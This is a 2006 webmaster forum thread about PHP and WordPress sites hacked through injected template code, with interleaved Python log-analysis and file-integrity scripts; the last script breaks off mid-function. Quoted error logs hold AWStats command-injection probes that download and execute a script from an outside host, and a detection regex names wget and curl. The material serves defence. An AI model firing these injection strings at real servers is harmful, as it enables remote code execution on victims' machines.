Site hacked ~ Check your Google cache NOW!

Discussion in 'Site & Server Administration' started by SEbasic, Feb 8, 2006.

  1. SEbasic

    SEbasic Peon

    #21
    For us it's been on various wp template files (So as a result, site wide), but in reality it could affect any sites that have php tags on the pages (I think ~ I just don't know until I figure out how they got access to the site)...
     
    SEbasic, Feb 8, 2006 IP
  2. T0PS3O

    T0PS3O Feel Good PLC

    #22
    Check your access logs. Better even, your error logs.

    It works like this. Prober knows that OS Software X has a hole in file osx/admin/index2.php

    Prober writes a script that takes any domain, adds osx/admin/index2.php at the end of it and lets the script do nothing but GETs all day to all these random hosts. As soon as it gets a status 200 instead of 404, it's hooked and will try and hack you, knowing you have that file.

    That's why it's bad practice IMO to install OS Software X (example) in its default folders like admin/. At the very least, rename admin to supersleuth/ and includes/ to /tobeincluded/ and 80% of the probes will fail.

    A typical day's error log with entries looking for files I don't have:

    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /phpmyadmin/read_dump.php HTTP/1.0" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /PMA/read_dump.php HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /mysql/read_dump.php HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /xampp/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /typo3/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /mysqladmin/read_dump.php HTTP/1.0" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/read_dump.php HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /db/read_dump.php HTTP/1.0" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /dbadmin/read_dump.php HTTP/1.0" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /web/phpMyAdmin/read_dump.php HTTP/1.0" 404 309 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/pma/read_dump.php HTTP/1.0" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/phpmyadmin/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpmyadmin2/read_dump.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpmyadmin1/read_dump.php HTTP/1.0" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpadmin/read_dump.php HTTP/1.0" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /myadmin/read_dump.php HTTP/1.0" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:09 +0000] "GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.2.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.5.6/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.5.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:10 +0000] "GET /phpMyAdmin-2.6.0-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin-2.6.1-pl3/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin-2.6.3-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.6.4-pl4/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.7.0-beta1/read_dump.php HTTP/1.0" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:11 +0000] "GET /phpMyAdmin%202.7.0-rc1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin%202.7.0/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin-2.6.4/read_dump.php HTTP/1.0" 404 311 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin%202.7.0-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    195.130.241.113 e.co.uk - [20/Jan/2006:21:52:12 +0000] "GET /phpMyAdmin-2.2.7-pl1/read_dump.php HTTP/1.0" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
    
    Note WordPress, Drupal and many other well-known packages...:
    
    69.64.38.143 e.co.uk - [21/Jan/2006:10:26:55 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:26:56 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:26:57 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:26:58 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:26:59 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:01 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:02 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:03 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:04 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:05 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:06 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    69.64.38.143 e.co.uk - [21/Jan/2006:10:27:07 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:17 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:18 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:20 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:24 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:25 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:26 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:28 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:29 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:30 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:31 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:33 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:37 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    61.114.201.234 e.co.uk - [21/Jan/2006:14:09:38 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:35 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:36 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:37 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e232%2e227%2e224%2fscript%3bchmod%20%2bx%20script%3b%2e%2fscript;echo%20YYY;echo|  HTTP/1.1" 404 307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:39 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:40 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:41 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:43 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:44 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:45 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:46 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:47 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    216.127.66.128 e.co.uk - [21/Jan/2006:14:22:48 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    
    
    Blocking their IPs is useless. It's a never ending story. As you can see they also check for unpassword-protected PHPMyAdmins and AWstats (for referer log spamming).

    These are all 404s so they didn't find what they were looking for. See the folder structures they look for and how they match default installs? That's why you NEVER install Drupal in yourdomain/drupal/ or WordPress in yourdomain/wp/ /wordpress/ or /blog/ if you want to beat these assholes.
     
    T0PS3O, Feb 8, 2006 IP
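The log review T0PS3O describes can be automated. The script below is an added example, not code from the thread or from any of the packages named in it: it parses Apache combined-format lines (with the leading virtual-host field the quoted lines have), flags any client that racks up a burst of 404s against non-existent paths in a short window, and separately flags request URIs that decode to shell-command syntax like the awstats `configdir=|...` probes. The sample lines are constructed (RFC 5737 documentation addresses, the download step of the awstats probe left out), and the indicator patterns and thresholds are my assumptions, not anything the thread states.

```python
"""Spot path-probing scanners and command-injection attempts in Apache
combined-format log lines.  Added example (not from the thread); the sample
lines are constructed, using RFC 5737 documentation addresses."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote

# Combined format with a leading virtual-host field, matching the thread's lines:
#   ip vhost ident [timestamp] "METHOD uri PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell syntax that has no business in a query string (assumed indicator list).
INJECTION_RE = re.compile(r'\|\s*\w|;\s*(cd|wget|curl|chmod|sh)\b|/tmp\b', re.I)


def parse_line(line):
    """Return a dict for one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["decoded_uri"] = unquote(rec["uri"])   # undo %2f, %3b, ... before inspecting
    return rec


def find_scanners(records, min_hits=5, window=timedelta(seconds=60)):
    """IPs that produced at least `min_hits` 404s inside any `window`: {ip: total_404s}."""
    by_ip = defaultdict(list)
    for r in records:
        if r["status"] == 404:
            by_ip[r["ip"]].append(r["ts"])
    scanners = {}
    for ip, times in by_ip.items():
        times.sort()
        for i in range(len(times) - min_hits + 1):
            if times[i + min_hits - 1] - times[i] <= window:
                scanners[ip] = len(times)
                break
    return scanners


def find_injection_attempts(records):
    """(ip, decoded uri) for requests whose URI carries shell-command syntax."""
    return [(r["ip"], r["decoded_uri"]) for r in records
            if INJECTION_RE.search(r["decoded_uri"])]


def analyze(lines, **kwargs):
    """Run both detectors over an iterable of raw log lines."""
    records = [r for r in map(parse_line, lines) if r]
    return {"scanners": find_scanners(records, **kwargs),
            "injection": find_injection_attempts(records)}


# Constructed sample: one host sweeping default admin paths, one awstats
# command-injection probe (download step omitted), one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /phpmyadmin/read_dump.php HTTP/1.0" 404 305 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:07 +0000] "GET /PMA/read_dump.php HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:08 +0000] "GET /admin/read_dump.php HTTP/1.0" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:08 +0000] "POST /xmlrpc.php HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:09 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
203.0.113.5 example.co.uk - [20/Jan/2006:21:52:09 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)"
198.51.100.7 example.co.uk - [21/Jan/2006:10:26:55 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3becho|  HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
192.0.2.10 example.co.uk - [21/Jan/2006:10:30:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for ip, n in report["scanners"].items():
        print(f"probable scanner {ip}: {n} x 404 in a short burst")
    for ip, uri in report["injection"]:
        print(f"injection attempt from {ip}: {uri}")
```

The burst-of-404s rule is what makes T0PS3O's point measurable: a scanner walking a list of default install paths produces dozens of misses per second from one address, which no human visitor does. The 404 itself is good news (the file wasn't there); the line to worry about is a 200 on one of those same paths, which is why the same parser is worth running over the access log as well as the error log.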
  3. Jim bob 9 pants

    Jim bob 9 pants Peon

    #23
    That's great, T0PS, thanks for that. I will spend some time checking this evening!!
     
    Jim bob 9 pants, Feb 8, 2006 IP
  4. SEbasic

    SEbasic Peon

    #24
    Damn, these guys are such fuckers...

    It's like black hat gone too far.
     
    SEbasic, Feb 8, 2006 IP
  5. classifieds

    classifieds Sopchoppy Flash

    #25
    This is not black hat it's criminal.
     
    classifieds, Feb 8, 2006 IP
  6. SEbasic

    SEbasic Peon

    #26
    Yep...

    I have no idea how to do anything about it at this stage though...

    I can't see anything in the logs that spells out how they did it, and I BET they used virus infected machines to do it anyway, so it's a bit of a deadend for now. :(
     
    SEbasic, Feb 8, 2006 IP
  7. utahtechjobs.com

    utahtechjobs.com Peon

    #27
    Is Wordpress affected by this?
     
    utahtechjobs.com, Feb 8, 2006 IP
  8. SEbasic

    SEbasic Peon

    #28
    Read the thread.

    YES!
     
    SEbasic, Feb 8, 2006 IP
  9. classifieds

    classifieds Sopchoppy Flash

    #29
    You have a subset of the machines that they've hacked (via the G search), which gives you a list of domains they are back-linking to, which gives you a list of the monetization services they are using, all of which should be tied to a bank account for payments.

    I would hunt them down if it took decades.
     
    classifieds, Feb 8, 2006 IP
  10. T0PS3O

    T0PS3O Feel Good PLC

    #30
    Can your host restrict access by IP to only include you?

    I'm sure they can also deny remote access like fopen etc. but being on a shared environment kind of sucks in that regard since whatever they change for you changes for everyone so it's unlikely.
     
    T0PS3O, Feb 8, 2006 IP
  11. Skinny

    Skinny Peon

    #31
    Okay I have some questions.

    I have a blog and have wordpress installed in the root folder. My admin folder is not admin but rather wp-admin.

    Should I be worried?
    Should I change that name?
    If so is that going to affect my site in any way?

    My cache is looking fine.

    Skinny
     
    Skinny, Feb 8, 2006 IP
  12. SEbasic

    SEbasic Peon

    #32
    WordPress sites (Which mine are) will be affected by this.

    At the moment, it appears it's affecting sites that use commonly available/open source scripts ~ I don't know that they are being especially targeted, but they are certainly being affected.

    I don't know how widespread this is, but I do know that Google has nearly 400k pages showing an error. There are lots more out there that aren't erroring.

    I don't know how they are targeting sites, so I don't know if you should be worried.
     
    SEbasic, Feb 8, 2006 IP
  13. T0PS3O

    T0PS3O Feel Good PLC

    #33
    It might not necessarily be the admin files they entered via. I don't know the root file names of WP but it could be any of them.

    osCommerce uses a filenames list so you can edit all of them really easily without having to dig through code in all files.

    If you know you don't have high-end security and are slack on back-ups - it might be a good idea to rename everything.

    It would be handy to know where they came in... Else it's like giving the entire ship a new hull just because there's a tiny little hole you can't find.

    Oli, did you try WP forums?
     
    T0PS3O, Feb 8, 2006 IP
  14. SEbasic

    SEbasic Peon

    #34
    T0PS...

    I guess I could restrict access myself using the .htaccess file, right?

    I was thinking of setting up a honey trap, but if they're using hacked machines to do it, that's not gonna be a lot of good.

    I haven't tried the forums, but it doesn't look like WP is being targeted specifically anyway, so should I be telling them, or the PHP dev guys, or what?
     
    SEbasic, Feb 8, 2006 IP
  15. Skinny

    Skinny Peon

    #35
    Skinny, Feb 8, 2006 IP
  16. T0PS3O

    T0PS3O Feel Good PLC

    #36
    It depends on whether they hack in via FTP or via PHP's file access functions. Chances are they can get to htaccess but you need to know their IP or your sites will be inaccessible for everybody.

    It could also be as simple as CHMOD mistakes. But I'm no expert on how they can get in and abuse systems.

    If your hosting space is compromised anyway, you might be able to find someone willing to poke around, someone who knows their shit.
     
    T0PS3O, Feb 8, 2006 IP
  17. Design Agent

    Design Agent Peon

    #37
    Some more sites:

    http://72.14.207.104/search?q=cache...ex.php+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=2
    http://72.14.207.104/search?q=cache...ss.php+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=6
    http://72.14.207.104/search?q=cache...llery+phpinclude.ru&hl=en&gl=uk&ct=clnk&cd=10

    There are loads - with 380,000 broken cases (some are references though), there must be many more working ones, and that's one address.

    A thread about it, though I'm not sure they are right, as we reset the permissions a few days ago and cleared out the files and it came back.
    http://www.pmachine.com/forums/viewthread/31111/
     
    Design Agent, Feb 8, 2006 IP
  18. digitalpoint

    digitalpoint Overlord of no one Staff

    #38
    Where is the PHP ultimately residing (inside a MySQL DB, template files, or?)
     
    digitalpoint, Feb 8, 2006 IP
  19. Design Agent

    Design Agent Peon

    #39
    Most of those results (380000) actually come from a few sites. (lots of pages)
     
    Design Agent, Feb 8, 2006 IP
  20. SEbasic

    SEbasic Peon

    #40
    These are big boys... They're running their own DNS...

    And like DA says, That thread doesn't make 100% sense...

    I want to make it clear that we have had separate sites, on separate servers that are not interlinked (as far as I'm aware :|) all affected by this ~ that's a pretty big coincidence...

    The first assumption was that this was a targeted attack, but the number of sites that are showing the error (which means that there are more sites out there that aren't erroring) is huge, so it's not a personal attack...

    Added
    They're standard WordPress template build files.

    They sit here

    .com/wp-content/themes/themename/
     
    SEbasic, Feb 8, 2006 IP
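Two things the thread establishes are that the injected PHP lives in ordinary theme files under `wp-content/themes/themename/` and that cleaning them out by hand did not stop it coming back. A hash baseline of the theme directory turns "did it come back?" into a question a cron job can answer. The script below is an added example, not code from the thread, WordPress or anyone in it: it records a SHA-256 per file, diffs the tree against that record on the next run, and runs a few textual indicators over whatever changed. The directory layout follows the path SEbasic gives; the indicator patterns (eval of decoded data, include/require of an http URL, include of request-controlled input) are my assumptions about what to look for, and the tree it builds in a temporary directory is constructed for the demo.

```python
"""Hash baseline for a WordPress theme directory so that injected or
re-injected PHP is noticed on the next run.  Added example; indicator
patterns are assumptions and the sample tree is constructed."""
import hashlib
import os
import re
import tempfile

# Textual indicators worth a manual look in a theme file (assumed list).
INDICATORS = {
    "eval_of_decoded_data": re.compile(
        r'eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\b', re.I),
    "remote_include": re.compile(
        r'\b(include|require)(_once)?\s*\(?\s*["\']https?://', re.I),
    "request_controlled_include": re.compile(
        r'\b(include|require)(_once)?\s*\(?\s*\$_(GET|POST|REQUEST|COOKIE)\b', re.I),
}


def sha256_file(path):
    """Streamed SHA-256 of one file, so large assets do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map of path relative to `root` -> sha256 for every file under it."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def diff_baseline(root, baseline):
    """Compare the tree under `root` with a stored baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current
                           if p in baseline and current[p] != baseline[p]),
    }


def suspicious_php(path):
    """Names of the indicator patterns that match the file's text."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        text = f.read()
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def demo():
    """Build a throwaway theme tree, baseline it, simulate tampering, report."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "themename")
        os.makedirs(theme)
        with open(os.path.join(theme, "header.php"), "w") as f:
            f.write("<?php get_header(); ?>\n")
        with open(os.path.join(theme, "footer.php"), "w") as f:
            f.write("<?php wp_footer(); ?>\n")
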